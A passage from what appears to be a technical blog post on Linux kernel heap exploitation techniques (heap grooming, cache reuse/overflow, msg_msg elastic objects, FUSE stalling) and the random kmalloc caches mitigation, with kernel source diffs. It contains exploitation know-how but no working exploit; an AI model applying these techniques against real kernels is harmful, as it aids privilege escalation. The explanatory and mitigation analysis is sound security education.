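        slab[i] = FREE_SLOT;            /* free every other allocation */

    return toy_alloc(slab, OBJ_X);      /* x takes one of the holes */
}
```

<p>Whichever hole <code>x</code> ends up in, the slot after it still holds a <code>y</code>, which is the layout we want for a linear overflow out of <code>x</code>.</p>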
<h4 id="cache-reuseoverflow-attacks">Cache Reuse/Overflow Attacks</h4>
<p>Remember earlier we mentioned how there are different types of general purpose caches and even private caches, all with their own slabs? What if our vulnerable object is in one cache and we found an object we really, <em>really</em> wanted to corrupt in another cache?</p>
<p>If we recall our memory allocator fundamentals<a href="https://sam4k.com/linternals-memory-allocators-part-1/">[2]</a>, we know that the page allocator is the fundamental memory allocator for the Linux kernel, sitting above it is the slab allocator. So the slab allocator makes use of the page allocator, this includes for the allocation of the chunks of memory used as slabs (to hold cache objects). Are you still with me?</p>
<p>So when all the objects in a slab are freed, the slab itself may in turn be freed back to the page allocator, ready to be reallocated. Can you see where this is going?</p>
<p><img src="https://sam4k.com/content/images/2023/10/bill_hader_omg.gif" alt=""></p>
<p>If we have a UAF on an object in a private cache slab, if that slab is then freed and reallocated as a general purpose cache, suddenly our UAF&rsquo;d memory is pointing to general purpose objects! Our options for corruption have suddenly expanded!</p>
<p>This kind of technique is known as a &ldquo;cache reuse&rdquo; attack and has been documented previously in more detail<a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">[3]</a>. By using a similar approach of manipulating the underlying page layout, &ldquo;cache overflow&rdquo; attacks are possible too, where you align two slabs from separate caches adjacent to one another in physical memory, which has been used in some great CTF writeups<a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">[4]</a>.</p>
<h4 id="elastic-objects">Elastic Objects</h4>
<p>Another cornerstone of contemporary heap exploitation is the use of &ldquo;elastic objects&rdquo;[6]. These are essentially structures that have a dynamic size; typically a length field will describe the size of a buffer within the same struct.</p>
<p>Sounds pretty straight forward, right? Why is this relevant? Well, we&rsquo;ve spoken about the bespoke nature of heap corruption vulnerabilities, and the variety of cache types and sizes.</p>
<p>Elastic objects can provide generic techniques for exploiting these vulnerabilities, as objects that can be corrupted across a variety of cache sizes due to their elastic nature. By generalising the object being corrupted, we can save a lot of the time that would otherwise be spent mining for objects that are corruptible for a certain cache size and then developing a bespoke technique for using that specific corruption to elevate privileges (which can be quite time consuming!).</p>
<p>A popular elastic object used in contemporary heap exploitation is <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9"><code>struct msg_msg</code></a>, which can be used to leverage an out-of-bounds heap write into arbitrary read/write<a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">[5]</a>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">/* one msg_msg structure for each message */
</span></span><span class="line"><span class="cl">struct msg_msg {
</span></span><span class="line"><span class="cl">	struct list_head m_list;
</span></span><span class="line"><span class="cl">	long m_type;
</span></span><span class="line"><span class="cl">	size_t m_ts;		/* message text size */
</span></span><span class="line"><span class="cl">	struct msg_msgseg *next;
</span></span><span class="line"><span class="cl">	void *security;
</span></span><span class="line"><span class="cl">	/* the actual message follows immediately */
</span></span><span class="line"><span class="cl">};
</span></span></code></pre></div><p><a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/msg.h#L9">include/linux/msg.h</a> (v6.6)</p>
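<p>To show what &ldquo;elastic&rdquo; buys us in practice, here&rsquo;s a small sketch of the sizing arithmetic. The struct is a userspace mirror of the header above with every field widened to 64 bits (so it assumes a 64-bit kernel), the helper names are made up, and it only covers messages small enough to fit in a single allocation; larger messages spill into <code>msg_msgseg</code> segments, which this ignores.</p>

```c
#include <stddef.h>
#include <stdint.h>

/* Userspace mirror of the msg_msg header, assuming a 64-bit kernel.
 * Illustrative only; not the kernel definition. */
struct toy_msg_msg {
    uint64_t m_list_next, m_list_prev;  /* struct list_head m_list */
    int64_t  m_type;
    uint64_t m_ts;                      /* message text size */
    uint64_t next;                      /* struct msg_msgseg *next */
    uint64_t security;                  /* void *security */
};

/* Total allocation size for a message whose text fits in one chunk:
 * the header followed immediately by the message text. */
static size_t toy_msg_alloc_size(size_t text_len)
{
    return sizeof(struct toy_msg_msg) + text_len;
}

/* Text length to send so the allocation exactly fills a bucket of
 * `bucket` bytes; 0 if the header alone doesn't leave any room. */
static size_t toy_text_len_for_bucket(size_t bucket)
{
    if (bucket <= sizeof(struct toy_msg_msg))
        return 0;
    return bucket - sizeof(struct toy_msg_msg);
}
```

<p>Under those assumptions the header is 48 bytes, so picking the message length lets us steer the same object into anything from a 64 byte bucket upwards, rather than hunting for a new victim object per cache size.</p>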
<h4 id="fuse">FUSE</h4>
<p><img src="https://sam4k.com/content/images/2023/10/theresmore.gif" alt=""></p>
<p>Seeing as we&rsquo;re going all out on the exploitation techniques here, I might as well throw in a <em><strong>quick</strong></em> shoutout to FUSE as well, which is commonly used in kernel exploitation.</p>
<p>Filesystem in Userspace &ldquo;is an interface for userspace programs to export a filesystem to the Linux kernel.&rdquo;<a href="https://github.com/libfuse/libfuse">[7]</a>, enabled via <a href="https://cateee.net/lkddb/web-lkddb/FUSE_FS.html"><code>CONFIG_FUSE_FS=y</code></a>. Essentially it allows, often unprivileged, users to define their own filesystems.</p>
<p>Normally, mounting filesystems is a privileged action and actually defining a filesystem would require you to write kernel code. With FUSE, we can do away with this. By defining the read operations in our FUSE FS, we&rsquo;re able to define what happens when the kernel tries to read one of our FUSE files, which includes sleeping&hellip;</p>
<p>This gives us the ability to arbitrarily block kernel threads that try to read files in our FUSE FS (essentially any access to user virtual addresses we control, as we can map in one of our FUSE files and pass that over to the kernel).</p>
<p>So what does this have to do with kernel exploitation? Well, as we mentioned previously, a key part of heap exploitation is finding interesting objects to corrupt or control the layout of memory. Ideally we want to be able to allocate and free these on demand, if they&rsquo;re immediately freed there&rsquo;s not too much we can do with them &hellip; right?</p>
<p>Perhaps! This is where FUSE comes in: if we have a scenario where an object we <em>really, really</em> want to corrupt is allocated and freed within the same system call, we may be able to keep it in memory if there&rsquo;s a userspace access we can block on between the allocation and free! You can find more on this, plus some examples, from this <a href="https://duasynt.com/blog/linux-kernel-heap-spray">2018 Duasynt blog post</a>.</p>
<hr>
<ol>
<li><a href="https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst">https://www.kernel.org/doc/Documentation/core-api/memory-allocation.rst</a></li>
<li><a href="https://sam4k.com/linternals-memory-allocators-part-1/">https://sam4k.com/linternals-memory-allocators-part-1/</a></li>
<li><a href="https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022">https://duasynt.com/blog/linux-kernel-heap-feng-shui-2022</a></li>
<li><a href="https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html">https://www.willsroot.io/2022/08/reviving-exploits-against-cred-struct.html</a></li>
<li><a href="https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html">https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html</a></li>
<li>the earliest mention i&rsquo;m aware of in a kernel xdev context is from the 2020 paper, <a href="https://zplin.me/papers/ELOISE.pdf">&ldquo;A Systematic Study of Elastic Objects in Kernel Exploitation&rdquo;</a>, could be wrong tho</li>
<li><a href="https://github.com/libfuse/libfuse">https://github.com/libfuse/libfuse</a></li>
<li><a href="https://duasynt.com/blog/linux-kernel-heap-spray">https://duasynt.com/blog/linux-kernel-heap-spray</a></li>
</ol>
<h2 id="introducing-random-kmalloc-caches">Introducing Random Kmalloc Caches</h2>
<p><img src="https://sam4k.com/content/images/2023/10/startin_simple-1.gif" alt=""></p>
<p>Well, that was quite the background read (sorry not sorry), but we&rsquo;re hopefully in a good position to dive into this new mitigation: <strong>Random kmalloc caches</strong><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">[1]</a>.</p>
<p>This mitigation affects the generic slab cache implementation. Previously, there was a single generic slab cache for each size &ldquo;step&rdquo;: <code>kmalloc-32</code>, <code>kmalloc-64</code>, <code>kmalloc-128</code> etc. This meant that a 40 byte object, allocated via <code>kmalloc()</code> with the correct GFP flags, was always going to end up in the <code>kmalloc-64</code> cache. Straightforward, right?</p>
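<p>To make the size &ldquo;step&rdquo; idea concrete, here&rsquo;s a minimal userspace sketch of the rounding. The <code>bucket_for()</code> helper and the bucket table are made up for illustration (the sizes assume a typical x86_64 SLUB config, and zero-size requests are ignored); the kernel&rsquo;s real lookup works differently under the hood:</p>

```c
#include <stddef.h>

/* Generic kmalloc bucket sizes, smallest first (assumed: typical x86_64 SLUB config). */
static const size_t kmalloc_buckets[] = {
	8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Hypothetical helper: smallest bucket that fits `size`, or 0 if none in this table does. */
size_t bucket_for(size_t size)
{
	size_t n = sizeof(kmalloc_buckets) / sizeof(kmalloc_buckets[0]);

	for (size_t i = 0; i < n; i++) {
		if (size <= kmalloc_buckets[i])
			return kmalloc_buckets[i];
	}
	return 0;
}
```

<p>With this table, <code>bucket_for(40)</code> gives 64, matching the <code>kmalloc-64</code> example above.</p>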
<p><code>CONFIG_RANDOM_KMALLOC_CACHES=y</code> introduces multiple generic slab caches for each size, 16 by default: the existing cache plus 15 copies (named <code>kmalloc-rnd-01-32</code>, <code>kmalloc-rnd-02-32</code> etc.). When an object is allocated via <code>kmalloc()</code>, it is assigned to one of these 16 caches &ldquo;randomly&rdquo;, depending on the callsite for the <code>kmalloc()</code> and a per-boot seed.</p>
<p>Developed by Huawei engineers, this mitigation aims to make exploiting slab heap corruption vulnerabilities more difficult. By distributing the available general purpose objects for heap feng shui for any given cache size non-deterministically across up to 16 different caches, it&rsquo;s harder for an attacker to target specific objects or caches for exploitation.</p>
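<p>As a rough mental model of that &ldquo;random&rdquo; choice, the sketch below hashes the callsite address together with the seed and keeps 4 bits, giving an index into the 16 caches. The names <code>hash64_model()</code> and <code>pick_cache()</code> are hypothetical, and the multiplicative hash is my assumption of a reasonable stand-in (it mirrors the kernel&rsquo;s generic <code>hash_64()</code>), so treat it as an illustration rather than the patch itself:</p>

```c
#include <stdint.h>

#define RANDOM_KMALLOC_CACHES_NR 15           /* copies, on top of the normal cache */
#define GOLDEN_RATIO_64 0x61C8864680B583EBull /* multiplier from the kernel's hash_64() */

/* Multiplicative hash keeping the top `bits` bits (bits must be in 1..64). */
static unsigned int hash64_model(uint64_t val, unsigned int bits)
{
	return (unsigned int)((val * GOLDEN_RATIO_64) >> (64 - bits));
}

/* Hypothetical helper: map a callsite address and per-boot seed to a cache index. */
unsigned int pick_cache(uint64_t callsite, uint64_t seed)
{
	/* log2(RANDOM_KMALLOC_CACHES_NR + 1) = 4 bits, so the result is in 0..15. */
	return hash64_model(callsite ^ seed, 4);
}
```

<p>The same callsite and seed always land in the same cache, which is why the choice only varies across boots and across callsites, not across repeated calls from one place.</p>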
<p>If you&rsquo;re interested in more information, you can also follow the initial discussions over on the Linux kernel mailing list.<a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[2]</a><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[3]</a><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[4]</a></p>
<hr>
<ol>
<li><a href="https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe">https://github.com/torvalds/linux/commit/3c6152940584290668b35fa0800026f6a1ae05fe</a></li>
<li><a href="https://lore.kernel.org/lkml/20230315095459.186113-1-gongruiqi1@huawei.com/">[PATCH RFC] Randomized slab caches for kmalloc()</a></li>
<li><a href="https://lore.kernel.org/lkml/20230508075507.1720950-1-gongruiqi1@huawei.com/">[PATCH RFC v2] Randomized slab caches for kmalloc()</a></li>
<li><a href="https://lore.kernel.org/lkml/20230714064422.3305234-1-gongruiqi@huaweicloud.com/#r">[PATCH v5] Randomized slab caches for kmalloc()</a></li>
</ol>
<h2 id="diving-into-the-implementation">Diving Into The Implementation</h2>
<p><img src="https://sam4k.com/content/images/2023/10/about_to_get_real_2-1.gif" alt=""></p>
<p>The time has come, I&rsquo;m sure you&rsquo;ve all been chomping at the bit for the last 2000 words, let&rsquo;s dig into the implementation for this patch and see what the deal is.</p>
<p>Honestly the implementation for this mitigation is actually pretty straightforward, with only 97 additions and 15 deletions across 7 files, so more than anything it&rsquo;s going to be a bit of a primer on the parts of the kmalloc API that are affected by this patchset.</p>
<p>We&rsquo;ll follow up with a bit of an analysis on the pros and cons of the implementation tho.</p>
<h3 id="cache-setup">Cache Setup</h3>
<p>So first things first, let&rsquo;s touch on how the kmalloc caches are actually created by the kernel and some of the changes needed to include the random cache copies.</p>
<p>The header additions include configurations for things like the number of cache copies:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span>	<span class="mi">15</span> <span class="c1">// # of cache copies
</span></span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="k">else</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span>	<span class="mi">0</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span></code></pre></div><p>The <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363"><code>kmalloc_cache_type</code></a> enum is used to manage the different kmalloc cache types. <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956"><code>create_kmalloc_caches()</code></a> allocates the initial <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slub_def.h#L98"><code>struct kmem_cache</code></a> objects, which represent the slab caches we&rsquo;ve been talking about, which are then stored in the exported <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L677"><code>struct kmem_cache *kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HIGH + 1]</code></a> array. As we can see from the definition, the cache type is used as one of the indexes into the array to fetch a cache, the other is the size index for that cache type (see <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L692"><code>size_index[24]</code></a>).</p>
<p>With that in mind, an entry for each of the cache copies is added to <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363"><code>enum kmalloc_cache_type</code></a> so that they&rsquo;re created and fetchable as part of the existing API:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="k">enum</span> <span class="n">kmalloc_cache_type</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_NORMAL</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifndef CONFIG_ZONE_DMA
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_DMA</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="cp">#ifndef CONFIG_MEMCG_KMEM
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_CGROUP</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="o">+</span>	<span class="n">KMALLOC_RANDOM_START</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>	<span class="n">KMALLOC_RANDOM_END</span> <span class="o">=</span> <span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_SLUB_TINY
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_RECLAIM</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#else
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_RECLAIM</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_ZONE_DMA
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_DMA</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_MEMCG_KMEM
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_CGROUP</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="n">NR_KMALLOC_TYPES</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h">include/linux/slab.h</a></p>
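<p>To see where everything lands, here&rsquo;s the same enum flattened for one hypothetical config: <code>CONFIG_RANDOM_KMALLOC_CACHES</code>, <code>CONFIG_ZONE_DMA</code> and <code>CONFIG_MEMCG_KMEM</code> enabled, <code>CONFIG_SLUB_TINY</code> disabled. The <code>_model</code> suffix and the <code>is_random_copy()</code> helper are mine, not the kernel&rsquo;s:</p>

```c
#define RANDOM_KMALLOC_CACHES_NR 15 /* number of cache copies */

/* enum kmalloc_cache_type with the #ifdefs resolved for the assumed config. */
enum kmalloc_cache_type_model {
	KMALLOC_NORMAL = 0,
	KMALLOC_RANDOM_START = KMALLOC_NORMAL,                                /* 0  */
	KMALLOC_RANDOM_END = KMALLOC_RANDOM_START + RANDOM_KMALLOC_CACHES_NR, /* 15 */
	KMALLOC_RECLAIM,                                                      /* 16 */
	KMALLOC_DMA,                                                          /* 17 */
	KMALLOC_CGROUP,                                                       /* 18 */
	NR_KMALLOC_TYPES                                                      /* 19 */
};

/* Hypothetical helper: nonzero if `type` is one of the 15 extra copies. */
int is_random_copy(int type)
{
	return type > KMALLOC_RANDOM_START && type <= KMALLOC_RANDOM_END;
}
```

<p>So index 0 doubles as both <code>KMALLOC_NORMAL</code> and the first of the 16 randomised slots, and under this config the first dimension of <code>kmalloc_caches</code> grows from 4 entries to 19.</p>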
<p>The <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L824"><code>kmalloc_info[]</code></a> array is another key data structure in the kmalloc cache initialisation. This array essentially contains a <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab.h#L275"><code>struct kmalloc_info_struct</code></a> for each of the kmalloc &ldquo;bucket&rdquo; sizes we talk about. Each element stores the <code>size</code> of the bucket and the <code>name</code> for the various cache types of that size, e.g. <code>kmalloc-rnd-01-64</code> or <code>kmalloc-cg-64</code>.</p>
<p>This array is then used to pull the correct cache <code>name</code> to pass to <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L661"><code>create_kmalloc_cache()</code></a> given the size index and cache type.</p>
<p>I&rsquo;m speeding through this, but you can probably tell already this is going to involve some macros. <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L809"><code>INIT_KMALLOC_INFO(__size, __short_size)</code></a> is used to initialise each of the elements in <code>kmalloc_info[]</code>, with additional macros to initialise each of the <code>name[]</code> elements according to type.</p>
<p>Below we can see the addition of the kmalloc random caches:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">__KMALLOC_RANDOM_CONCAT</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)</span> <span class="n">a</span> <span class="err">##</span> <span class="n">b</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMALLOC_RANDOM_NAME</span><span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="n">sz</span><span class="p">)</span> <span class="nf">__KMALLOC_RANDOM_CONCAT</span><span class="p">(</span><span class="n">KMA_RAND_</span><span class="p">,</span> <span class="n">N</span><span class="p">)(</span><span class="n">sz</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_1</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>                  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-01-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_2</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_1</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-02-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_3</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_2</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-03-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_4</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_3</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-04-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_5</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_4</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-05-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_6</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_5</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-06-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_7</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_6</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-07-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_8</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_7</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-08-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_9</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_8</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-09-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_10</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_9</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-10-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_11</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_10</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-11-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_12</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_11</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-12-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_13</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_12</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-13-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_14</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_13</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">14</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-14-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_15</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_14</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">15</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-15-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="k">else</span> <span class="c1">// CONFIG_RANDOM_KMALLOC_CACHES
</span></span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMALLOC_RANDOM_NAME</span><span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="n">sz</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>
